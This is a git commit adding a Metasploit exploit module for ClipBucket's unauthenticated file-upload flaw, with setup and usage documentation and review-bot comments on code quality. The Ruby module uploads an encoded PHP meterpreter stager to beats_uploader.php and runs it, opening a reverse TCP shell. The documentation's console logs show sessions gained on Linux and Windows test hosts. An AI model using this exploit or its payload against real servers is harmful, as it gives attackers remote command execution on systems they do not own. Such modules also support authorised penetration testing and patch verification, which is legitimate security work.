clipbucket_fileupload_exec

GSoC/Meterpreter_Web_Console
Touhid M Shaikh 2018-03-12 14:17:13 +05:30
parent b9e0b628ef
commit 9b0ba4a6fa
2 changed files with 251 additions and 0 deletions

@ -0,0 +1,111 @@
## Description
A malicious file can be uploaded into the webserver by an unauthenticated attacker. It is possible for an attacker to upload
a malicious script file to issue operating system commands.
## Vulnerable Application
According To publicly exploit Disclosure of ClipBucket < 4.0.0 - Release 4902
this application is vulnerable to Unauthenticated Arbitrary File Upload
read more : https://www.exploit-db.com/exploits/44250/
**Vulnerable Application Link**
https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip
## Vulnerable Application Installation Setup.
Download Application : ```wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip```
Unzip : ```unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ```
Move In WebDirectory : ```mv clipbucket-4881/upload/* /var/www/html/```
Change Owner : ```chown -R www-data:www-data /var/www/html/```
**And Follow Clipbucket Installer**
Visit : http://localhost/
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/clipbucket_fileupload_exec`
4. Do: `set rport <port>`
5. Do: `set rhost <ip>`
6. Do: `check`
```
[*] 10.22.1.4:80 The target appears to be vulnerable.
```
7. Do: `set lport <port>`
8. Do: `set lhost <ip>`
9. Do: `exploit`
10. You should get a shell.
## Options
**TARGETURI**
TARGETURI by default is `/`, however it can be changed.
## Scenarios
**TESTED AGAINST LINUX**
```
msf > use exploit/multi/http/clipbucket_fileupload_exec
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4
rhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set targeturi clipbucket
targeturi => clipbucket
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 5050
lport => 5050
msf exploit(multi/http/clipbucket_fileupload_exec) > run
[*] Started reverse TCP handler on 10.22.1.4:5050
[*] Uploading payload..
[+] Looking For Payload ....
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php
[*] Executing Payload [ clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php ]
[*] Sending stage (37543 bytes) to 10.22.1.4
[*] Meterpreter session 1 opened (10.22.1.4:5050 -> 10.22.1.4:41752) at 2018-03-12 13:52:10 +0530
[+] Deleted 1520842928949a3f.php
meterpreter > sysinfo
Computer : linux
OS : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64
Meterpreter : php/linux
meterpreter >
```
**TESTED AGAINST WINDOWS**
```
msf > use exploit/multi/http/clipbucket_fileupload_exec
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13
rhost => 10.22.1.13
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set TARGETURI clipbucketest
TARGETURI => clipbucketest
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 4545
lport => 4545
msf exploit(multi/http/clipbucket_fileupload_exec) > exploit
[*] Started reverse TCP handler on 10.22.1.4:4545
[*] Uploading payload..
[+] Looking For Payload ....
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php
[*] Executing Payload [ clipbucketest/actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php ]
[*] Sending stage (37543 bytes) to 10.22.1.13
[*] Meterpreter session 1 opened (10.22.1.4:4545 -> 10.22.1.13:49166) at 2018-03-12 14:11:10 +0530
[+] Deleted 152084407045df09.php
meterpreter > sysinfo
Computer : AGENT22-PC
OS : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter >
```
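
Review bot: In Verification Steps, the fenced sample output after step 6 (`check`) starts at column zero, which ends the ordered list in most Markdown renderers, so steps 7 to 10 can render as a separate list; indent that fence under step 6. In the installation setup, each command is wrapped in triple backticks on the same line as its label (Download Application, Unzip, Move In WebDirectory, Change Owner); one fenced block with a command per line would render reliably and be easier to copy. The text names the affected range as "ClipBucket < 4.0.0 - Release 4902" while the linked archive is clipbucket-4881, so it would help to state explicitly which build the two scenarios were run against.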

@ -0,0 +1,140 @@
##
# This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "ClipBucket Unauthenticated Arbitrary File Upload lower than 4.0.0 - Release 4902",
'Description' => %q{
This module exploits a vulnerability found in ClipBucket version Lower than 4.0.0 - Release 4902.
A malicious file can be uploaded into the webserver using Unauthenticated Arbitrary File Upload attack.
It is possible for an attacker to upload a malicious script to issue operating system commands.
this issue caused by improper session handling in /action/beats uploader.php file. This module tested on ClipBucket [lt] 4.0.0 - Release 4902 in Windows7 and Kali Linux .
},
'License' => MSF_LICENSE,
'Author' =>
[
'www.sec-consult.com', # Vulnerability Discovery, PoC
'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit module
],
'References' =>
[
[ 'EDB', '44250' ]
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64'
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Clipbucket < 4.0.0 - Release 4902', {}]
],
'Privileged' => false,
'DisclosureDate' => "Mar 03 2018",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
])
end
def uri
return target_uri.path
end
def check
# Check version
peer = "#{rhost}:#{rport}"
vprint_status("Trying to detect ClipBucket on target.")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "readme")
})
res2 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "actions", "beats_uploader.php")
})
if res and res.code == 200 and res.body =~ /ClipBucket/ and res2.code == 200
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Unknown
end
vprint_status("Version NOT detected")
end
def exploit
peer = "#{rhost}:#{rport}"
# generate the PHP meterpreter payload
stager = '<?php '
stager << payload.encode
stager << '?>'
# Setting POST data
post_data = Rex::MIME::Message.new
post_data.add_part(stager, content_type = "application/octet-stream", transfer_encoding = nil, content_disposition = "form-data; name=\"file\"; filename=\"pfile.php\"") # payload
post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"plupload\"") # require for uploading
post_data.add_part('agent22.php', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"name\"")
data = post_data.to_s
print_status("Uploading payload..")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "actions", "beats_uploader.php"),
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
jsonres = res.get_json_document
# If the server returns 200 and success yes, we assume we uploaded the malicious
# file successfully
if not res or res.code != 200 or jsonres['success'] != 'yes'
fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
end
print_good("Looking For Payload .... ")
pdir = jsonres['file_directory']
file_name = jsonres['file_name']
pext = jsonres['extension']
print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext} ")
# Payload name
pname = file_name + ".php"
# Cleanup is Good Idea .
register_files_for_cleanup(pname)
print_status("Executing Payload [ #{uri}/actions/#{pdir}/#{pname} ]" )
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "actions", pdir, pname)
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
print_error("Unexpected response, probably the exploit failed")
end
end
end
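
Review bot: Two responses are dereferenced before they are nil-checked: in `check`, the condition evaluates `res2.code == 200` with no guard on `res2`, and in `exploit`, `jsonres = res.get_json_document` runs one line before `if not res`, so a timeout on either request raises NoMethodError instead of returning a check code or reaching `fail_with`. Add `res2` to the condition in `check`, and move the `get_json_document` call below the nil test in `exploit`. Also in `check`, the trailing `vprint_status("Version NOT detected")` is unreachable because both branches return, and the `# Check version` comment does not match the code, which compares no version and only looks for the string ClipBucket in `readme` plus a 200 from `beats_uploader.php`. In `exploit`, `Failure::None` is a misleading reason for a failed upload (`Failure::UnexpectedReply` fits better), the final `if res and res.code != 200` stays silent when the request gets no response at all, and `pext` is read from the JSON but `pname` hardcodes `".php"`. The local `peer` assignments are unnecessary, and the `content_type = ...` style arguments to `add_part` are plain positional arguments that also create unused locals; pass the values directly.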